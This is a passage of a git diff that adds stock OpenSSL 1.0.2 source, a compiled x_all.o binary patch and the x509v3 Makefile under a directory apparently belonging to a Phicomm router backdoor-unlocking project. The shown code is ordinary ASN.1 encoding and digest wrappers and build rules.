+    return ASN1_d2i_fp_of(EC_KEY, EC_KEY_new, d2i_EC_PUBKEY, fp, eckey);
+}
+
+int i2d_EC_PUBKEY_fp(FILE *fp, EC_KEY *eckey)
+{
+    return ASN1_i2d_fp_of(EC_KEY, i2d_EC_PUBKEY, fp, eckey);
+}
+
+EC_KEY *d2i_ECPrivateKey_fp(FILE *fp, EC_KEY **eckey)
+{
+    return ASN1_d2i_fp_of(EC_KEY, EC_KEY_new, d2i_ECPrivateKey, fp, eckey);
+}
+
+int i2d_ECPrivateKey_fp(FILE *fp, EC_KEY *eckey)
+{
+    return ASN1_i2d_fp_of(EC_KEY, i2d_ECPrivateKey, fp, eckey);
+}
+# endif
+EC_KEY *d2i_EC_PUBKEY_bio(BIO *bp, EC_KEY **eckey)
+{
+    return ASN1_d2i_bio_of(EC_KEY, EC_KEY_new, d2i_EC_PUBKEY, bp, eckey);
+}
+
+int i2d_EC_PUBKEY_bio(BIO *bp, EC_KEY *ecdsa)
+{
+    return ASN1_i2d_bio_of(EC_KEY, i2d_EC_PUBKEY, bp, ecdsa);
+}
+
+EC_KEY *d2i_ECPrivateKey_bio(BIO *bp, EC_KEY **eckey)
+{
+    return ASN1_d2i_bio_of(EC_KEY, EC_KEY_new, d2i_ECPrivateKey, bp, eckey);
+}
+
+int i2d_ECPrivateKey_bio(BIO *bp, EC_KEY *eckey)
+{
+    return ASN1_i2d_bio_of(EC_KEY, i2d_ECPrivateKey, bp, eckey);
+}
+#endif
+
+int X509_pubkey_digest(const X509 *data, const EVP_MD *type,
+                       unsigned char *md, unsigned int *len)
+{
+    ASN1_BIT_STRING *key;
+    key = X509_get0_pubkey_bitstr(data);
+    if (!key)
+        return 0;
+    return EVP_Digest(key->data, key->length, md, len, type, NULL);
+}
+
+int X509_digest(const X509 *data, const EVP_MD *type, unsigned char *md,
+                unsigned int *len)
+{
+    return (ASN1_item_digest
+            (ASN1_ITEM_rptr(X509), type, (char *)data, md, len));
+}
+
+int X509_CRL_digest(const X509_CRL *data, const EVP_MD *type,
+                    unsigned char *md, unsigned int *len)
+{
+    return (ASN1_item_digest
+            (ASN1_ITEM_rptr(X509_CRL), type, (char *)data, md, len));
+}
+
+int X509_REQ_digest(const X509_REQ *data, const EVP_MD *type,
+                    unsigned char *md, unsigned int *len)
+{
+    return (ASN1_item_digest
+            (ASN1_ITEM_rptr(X509_REQ), type, (char *)data, md, len));
+}
+
+int X509_NAME_digest(const X509_NAME *data, const EVP_MD *type,
+                     unsigned char *md, unsigned int *len)
+{
+    return (ASN1_item_digest
+            (ASN1_ITEM_rptr(X509_NAME), type, (char *)data, md, len));
+}
+
+int PKCS7_ISSUER_AND_SERIAL_digest(PKCS7_ISSUER_AND_SERIAL *data,
+                                   const EVP_MD *type, unsigned char *md,
+                                   unsigned int *len)
+{
+    return (ASN1_item_digest(ASN1_ITEM_rptr(PKCS7_ISSUER_AND_SERIAL), type,
+                             (char *)data, md, len));
+}
+
+#ifndef OPENSSL_NO_FP_API
+X509_SIG *d2i_PKCS8_fp(FILE *fp, X509_SIG **p8)
+{
+    return ASN1_d2i_fp_of(X509_SIG, X509_SIG_new, d2i_X509_SIG, fp, p8);
+}
+
+int i2d_PKCS8_fp(FILE *fp, X509_SIG *p8)
+{
+    return ASN1_i2d_fp_of(X509_SIG, i2d_X509_SIG, fp, p8);
+}
+#endif
+
+X509_SIG *d2i_PKCS8_bio(BIO *bp, X509_SIG **p8)
+{
+    return ASN1_d2i_bio_of(X509_SIG, X509_SIG_new, d2i_X509_SIG, bp, p8);
+}
+
+int i2d_PKCS8_bio(BIO *bp, X509_SIG *p8)
+{
+    return ASN1_i2d_bio_of(X509_SIG, i2d_X509_SIG, bp, p8);
+}
+
+#ifndef OPENSSL_NO_FP_API
+PKCS8_PRIV_KEY_INFO *d2i_PKCS8_PRIV_KEY_INFO_fp(FILE *fp,
+                                                PKCS8_PRIV_KEY_INFO **p8inf)
+{
+    return ASN1_d2i_fp_of(PKCS8_PRIV_KEY_INFO, PKCS8_PRIV_KEY_INFO_new,
+                          d2i_PKCS8_PRIV_KEY_INFO, fp, p8inf);
+}
+
+int i2d_PKCS8_PRIV_KEY_INFO_fp(FILE *fp, PKCS8_PRIV_KEY_INFO *p8inf)
+{
+    return ASN1_i2d_fp_of(PKCS8_PRIV_KEY_INFO, i2d_PKCS8_PRIV_KEY_INFO, fp,
+                          p8inf);
+}
+
+int i2d_PKCS8PrivateKeyInfo_fp(FILE *fp, EVP_PKEY *key)
+{
+    PKCS8_PRIV_KEY_INFO *p8inf;
+    int ret;
+    p8inf = EVP_PKEY2PKCS8(key);
+    if (!p8inf)
+        return 0;
+    ret = i2d_PKCS8_PRIV_KEY_INFO_fp(fp, p8inf);
+    PKCS8_PRIV_KEY_INFO_free(p8inf);
+    return ret;
+}
+
+int i2d_PrivateKey_fp(FILE *fp, EVP_PKEY *pkey)
+{
+    return ASN1_i2d_fp_of(EVP_PKEY, i2d_PrivateKey, fp, pkey);
+}
+
+EVP_PKEY *d2i_PrivateKey_fp(FILE *fp, EVP_PKEY **a)
+{
+    return ASN1_d2i_fp_of(EVP_PKEY, EVP_PKEY_new, d2i_AutoPrivateKey, fp, a);
+}
+
+int i2d_PUBKEY_fp(FILE *fp, EVP_PKEY *pkey)
+{
+    return ASN1_i2d_fp_of(EVP_PKEY, i2d_PUBKEY, fp, pkey);
+}
+
+EVP_PKEY *d2i_PUBKEY_fp(FILE *fp, EVP_PKEY **a)
+{
+    return ASN1_d2i_fp_of(EVP_PKEY, EVP_PKEY_new, d2i_PUBKEY, fp, a);
+}
+
+#endif
+
+PKCS8_PRIV_KEY_INFO *d2i_PKCS8_PRIV_KEY_INFO_bio(BIO *bp,
+                                                 PKCS8_PRIV_KEY_INFO **p8inf)
+{
+    return ASN1_d2i_bio_of(PKCS8_PRIV_KEY_INFO, PKCS8_PRIV_KEY_INFO_new,
+                           d2i_PKCS8_PRIV_KEY_INFO, bp, p8inf);
+}
+
+int i2d_PKCS8_PRIV_KEY_INFO_bio(BIO *bp, PKCS8_PRIV_KEY_INFO *p8inf)
+{
+    return ASN1_i2d_bio_of(PKCS8_PRIV_KEY_INFO, i2d_PKCS8_PRIV_KEY_INFO, bp,
+                           p8inf);
+}
+
+int i2d_PKCS8PrivateKeyInfo_bio(BIO *bp, EVP_PKEY *key)
+{
+    PKCS8_PRIV_KEY_INFO *p8inf;
+    int ret;
+    p8inf = EVP_PKEY2PKCS8(key);
+    if (!p8inf)
+        return 0;
+    ret = i2d_PKCS8_PRIV_KEY_INFO_bio(bp, p8inf);
+    PKCS8_PRIV_KEY_INFO_free(p8inf);
+    return ret;
+}
+
+int i2d_PrivateKey_bio(BIO *bp, EVP_PKEY *pkey)
+{
+    return ASN1_i2d_bio_of(EVP_PKEY, i2d_PrivateKey, bp, pkey);
+}
+
+EVP_PKEY *d2i_PrivateKey_bio(BIO *bp, EVP_PKEY **a)
+{
+    return ASN1_d2i_bio_of(EVP_PKEY, EVP_PKEY_new, d2i_AutoPrivateKey, bp, a);
+}
+
+int i2d_PUBKEY_bio(BIO *bp, EVP_PKEY *pkey)
+{
+    return ASN1_i2d_bio_of(EVP_PKEY, i2d_PUBKEY, bp, pkey);
+}
+
+EVP_PKEY *d2i_PUBKEY_bio(BIO *bp, EVP_PKEY **a)
+{
+    return ASN1_d2i_bio_of(EVP_PKEY, EVP_PKEY_new, d2i_PUBKEY, bp, a);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x_all.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x_all.o
new file mode 100644
index 0000000000000000000000000000000000000000..44bad2f596fa2ad63669cda6e43242dbff12a564
GIT binary patch
literal 15544
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
E1YQ9iL;wH)

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/Makefile
new file mode 100644
index 0000000..6c3ecaf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/Makefile
@@ -0,0 +1,558 @@
+#
+# OpenSSL/crypto/x509v3/Makefile
+#
+
+DIR=	x509v3
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=v3nametest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	v3_bcons.c v3_bitst.c v3_conf.c v3_extku.c v3_ia5.c v3_lib.c \
+v3_prn.c v3_utl.c v3err.c v3_genn.c v3_alt.c v3_skey.c v3_akey.c v3_pku.c \
+v3_int.c v3_enum.c v3_sxnet.c v3_cpols.c v3_crld.c v3_purp.c v3_info.c \
+v3_ocsp.c v3_akeya.c v3_pmaps.c v3_pcons.c v3_ncons.c v3_pcia.c v3_pci.c \
+pcy_cache.c pcy_node.c pcy_data.c pcy_map.c pcy_tree.c pcy_lib.c \
+v3_asid.c v3_addr.c v3_scts.c
+LIBOBJ= v3_bcons.o v3_bitst.o v3_conf.o v3_extku.o v3_ia5.o v3_lib.o \
+v3_prn.o v3_utl.o v3err.o v3_genn.o v3_alt.o v3_skey.o v3_akey.o v3_pku.o \
+v3_int.o v3_enum.o v3_sxnet.o v3_cpols.o v3_crld.o v3_purp.o v3_info.o \
+v3_ocsp.o v3_akeya.o v3_pmaps.o v3_pcons.o v3_ncons.o v3_pcia.o v3_pci.o \
+pcy_cache.o pcy_node.o pcy_data.o pcy_map.o pcy_tree.o pcy_lib.o \
+v3_asid.o v3_addr.o v3_scts.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= x509v3.h
+HEADER=	$(EXHEADER) pcy_int.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+pcy_cache.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_cache.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_cache.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_cache.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_cache.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_cache.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_cache.o: ../../include/openssl/opensslconf.h
+pcy_cache.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pcy_cache.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pcy_cache.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pcy_cache.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pcy_cache.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pcy_cache.o: ../cryptlib.h pcy_cache.c pcy_int.h
+pcy_data.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_data.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_data.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_data.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_data.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_data.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_data.o: ../../include/openssl/opensslconf.h
+pcy_data.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pcy_data.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pcy_data.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pcy_data.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pcy_data.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pcy_data.o: ../cryptlib.h pcy_data.c pcy_int.h
+pcy_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_lib.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_lib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pcy_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+pcy_lib.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pcy_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pcy_lib.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pcy_lib.o: ../../include/openssl/x509v3.h ../cryptlib.h pcy_int.h pcy_lib.c
+pcy_map.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_map.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_map.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_map.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_map.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_map.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_map.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pcy_map.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+pcy_map.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pcy_map.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pcy_map.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pcy_map.o: ../../include/openssl/x509v3.h ../cryptlib.h pcy_int.h pcy_map.c
+pcy_node.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pcy_node.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+pcy_node.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pcy_node.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_node.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_node.o: ../../include/openssl/opensslconf.h
+pcy_node.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pcy_node.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pcy_node.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pcy_node.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pcy_node.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pcy_node.o: pcy_int.h pcy_node.c
+pcy_tree.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_tree.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_tree.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_tree.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_tree.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_tree.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_tree.o: ../../include/openssl/opensslconf.h
+pcy_tree.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pcy_tree.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pcy_tree.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pcy_tree.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pcy_tree.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pcy_tree.o: ../cryptlib.h pcy_int.h pcy_tree.c
+v3_addr.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_addr.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_addr.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_addr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_addr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_addr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_addr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_addr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_addr.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_addr.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_addr.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_addr.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_addr.o: ../cryptlib.h v3_addr.c
+v3_akey.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_akey.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_akey.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_akey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_akey.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_akey.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_akey.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_akey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_akey.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_akey.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_akey.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_akey.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_akey.o: ../cryptlib.h v3_akey.c
+v3_akeya.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_akeya.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_akeya.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_akeya.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_akeya.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_akeya.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_akeya.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_akeya.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_akeya.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_akeya.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_akeya.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
